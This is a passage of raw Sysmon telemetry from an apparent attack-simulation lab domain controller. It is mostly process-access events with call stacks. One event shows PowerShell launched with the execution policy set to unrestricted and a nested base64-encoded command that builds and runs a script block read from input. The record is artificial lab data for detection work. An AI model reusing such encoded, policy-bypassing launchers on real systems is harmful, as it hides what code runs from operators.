10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3DD2-5F80-F202-000000007E01}23364516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68f432a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e412f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e3e00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68e95465(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683a4996(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68402e65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e64ca(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e64ca(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e635b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683d82e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e4813(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e4406(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e412f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683e3e00(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68e95465(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683cac61(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+683ca231(wow64) 10341000x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.360{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.296{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.296{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.264{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mwnscich.qfe.ps12020-10-09 10:39:14.264 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.249{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-F202-000000007E01}2336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.233{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL